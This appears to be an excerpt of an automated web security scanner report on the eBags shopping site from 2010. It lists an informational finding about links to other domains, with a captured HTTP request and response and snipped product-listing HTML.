<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewBrands.gif" border="0" hspace="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<td width="28" align="right" valign="middle">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/BrandSearch/icon_NewStyles.gif" border="0" hspace="2">
</td>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.4. http://www.ebags.com/category/travel-accessories/20014443  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /category/travel-accessories/20014443

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /category/travel-accessories/20014443?ne=100 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373821|PC#1293371743230-938821.20#1294581561|check#true#1293372021; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1239; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371960055}; s_sq=ebagsprod%3D%2526pid%253DShopping%252520Cart%252520%25253A%252520View%252520Cart%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fsale%25252Ftravel_accessories%25252Fcategory_search%25252Findex.cfm%25253FNe%25253D100%252526N%25253D4001%25252B20014443%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:53 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 117508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
</script>
<img name="comparepix" src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width=1 height=1 align="right">
<style>
...[SNIP]...
<a title="eBags Value Set: Packing Cubes + Slim Packing Cubes" href="/product/ebags/value-set-packing-cubes-slim-packing-cubes/115846?productid=1302042"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/115846_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Packing Cubes + Slim Packing Cubes" onmouseover="return !ProductHover(115846, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Piazza Day Bag" href="/product/ebags/piazza-day-bag/94553?productid=1237311"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/94553_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Piazza Day Bag" onmouseover="return !ProductHover(94553, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Sydney Bagg Silver Hardware" href="/product/baggallini/sydney-bagg-silver-hardware/143936?productid=10001524"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/143936_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Sydney Bagg Silver Hardware" onmouseover="return !ProductHover(143936, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini City Bagg - Crinkle Nylon" href="/product/baggallini/city-bagg-crinkle-nylon/87376?productid=1129577"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/87376_6_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini City Bagg - Crinkle Nylon" onmouseover="return !ProductHover(87376, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini A La Carte Bagg - Medium - Crinkle Nylon" href="/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617?productid=1283460"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/107617_7_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini A La Carte Bagg - Medium - Crinkle Nylon" onmouseover="return !ProductHover(107617, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Complete Cosmetic. Bagg - Rip Stop Nylon" href="/product/baggallini/complete-cosmetic-bagg-rip-stop-nylon/47450?productid=510849"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/47450_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Complete Cosmetic. Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(47450, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Everyday Bagg" href="/product/baggallini/everyday-bagg/143934?productid=10001514"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/143934_10_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Everyday Bagg" onmouseover="return !ProductHover(143934, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Value Set: Packing Cubes + Pack-It-Flat + Shoe Sleeves" href="/product/ebags/value-set-packing-cubes-pack-it-flat-shoe-sleeves/106795?productid=1281354"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/106795_5_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Packing Cubes + Pack-It-Flat + Shoe Sleeves" onmouseover="return !ProductHover(106795, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Around Town Bagg - Crinkle Nylon" href="/product/baggallini/around-town-bagg-crinkle-nylon/113065?productid=1298468"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/113065_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Around Town Bagg - Crinkle Nylon" onmouseover="return !ProductHover(113065, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Uptown Bagg - Crinkle Nylon" href="/product/baggallini/uptown-bagg-crinkle-nylon/107614?productid=1283436"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/107614_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Uptown Bagg - Crinkle Nylon" onmouseover="return !ProductHover(107614, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Expandable Tote - Crinkle Nylon" href="/product/baggallini/expandable-tote-crinkle-nylon/47388?productid=510422"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/47388_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Expandable Tote - Crinkle Nylon" onmouseover="return !ProductHover(47388, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Zipper Bagg - Crinkle Nylon" href="/product/baggallini/zipper-bagg-crinkle-nylon/113067?productid=1298484"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/113067_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Zipper Bagg - Crinkle Nylon" onmouseover="return !ProductHover(113067, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Town Tote" href="/product/baggallini/town-tote/143945?productid=10001560"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/143945_9_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Town Tote" onmouseover="return !ProductHover(143945, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Wallet.Bagg - Large - Crinkle Nylon" href="/product/baggallini/walletbagg-large-crinkle-nylon/47357?productid=510072"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/47357_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Wallet.Bagg - Large - Crinkle Nylon" onmouseover="return !ProductHover(47357, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Hanging Cosmetic Bagg - Rip Stop Nylon" href="/product/baggallini/hanging-cosmetic-bagg-rip-stop-nylon/5733?productid=790156"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/5733_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Hanging Cosmetic Bagg - Rip Stop Nylon" onmouseover="return !ProductHover(5733, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Bagg-in-a- Pouch - Medium - Crinkle Nylon" href="/product/baggallini/bagg-in-a-pouch-medium-crinkle-nylon/47366?productid=510125"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/47366_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Bagg-in-a- Pouch - Medium - Crinkle Nylon" onmouseover="return !ProductHover(47366, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Aurielle-Carryland Pebble Backpack Oval Backpack&iexcl;Sling" href="/product/aurielle-carryland/pebble-backpack-oval-backpacksling/16536?productid=60898"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/16536_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Aurielle-Carryland Pebble Backpack Oval Backpack&iexcl;Sling" onmouseover="return !ProductHover(16536, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Sydney Bagg Gold Hardware" href="/product/baggallini/sydney-bagg-gold-hardware/143935?productid=10001515"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/143935_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Sydney Bagg Gold Hardware" onmouseover="return !ProductHover(143935, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="baggallini Baby Hampton Bagg - Crinkle Nylon" href="/product/baggallini/baby-hampton-bagg-crinkle-nylon/107612?productid=1283420"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/107612_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="baggallini Baby Hampton Bagg - Crinkle Nylon" onmouseover="return !ProductHover(107612, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Case Logic iPod touch&amp;sup3; Pop Flower Case" href="/product/case-logic/ipod-touch-pop-flower-case/117748?productid=1306237"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/117748_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Case Logic iPod touch&amp;sup3; Pop Flower Case" onmouseover="return !ProductHover(117748, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="eBags Value Set: Packing Cubes + Shoe Sleeves" href="/product/ebags/value-set-packing-cubes-shoe-sleeves/106798?productid=1281388"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/106798_4_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="eBags Value Set: Packing Cubes + Shoe Sleeves" onmouseover="return !ProductHover(106798, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
<a title="Vera Bradley Travel Cosmetic" href="/product/vera-bradley/travel-cosmetic/130505?productid=10116086"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/130505_19_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=140&wid=140" width=140 height=140 border=0 alt="Vera Bradley Travel Cosmetic" onmouseover="return !ProductHover(130505, event);" onmouseout="ProductHoverClear('productHoverContent');"></a>
...[SNIP]...
